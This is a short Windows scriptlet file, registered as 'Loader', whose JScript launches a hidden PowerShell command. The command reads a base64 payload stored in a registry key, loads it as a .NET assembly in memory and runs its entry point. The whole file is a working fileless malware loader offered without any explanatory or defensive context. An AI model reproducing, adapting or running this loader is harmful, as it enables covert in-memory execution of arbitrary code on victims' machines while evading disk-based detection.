<?XML version="1.0"?>
<scriptlet>
<registration progid="Loader" classid="{00000000-0000-0000-0000-000000000001}">
</registration>
<script language="JScript">
<![CDATA[
    var obj = new ActiveXObject("WScript.Shell");
    var ps = "powershell -NoP -W Hidden -C \"$b64=(Get-ItemProperty 'HKCU:\\Software\\Classes\\CLSID\\{00000000-0000-0000-0000-000000000001}').Payload;[System.Reflection.Assembly]::Load([System.Convert]::FromBase64String($b64)).EntryPoint.Invoke($null,$null)\"";
    obj.Run(ps, 0, false);
]]>
</script>
</scriptlet>
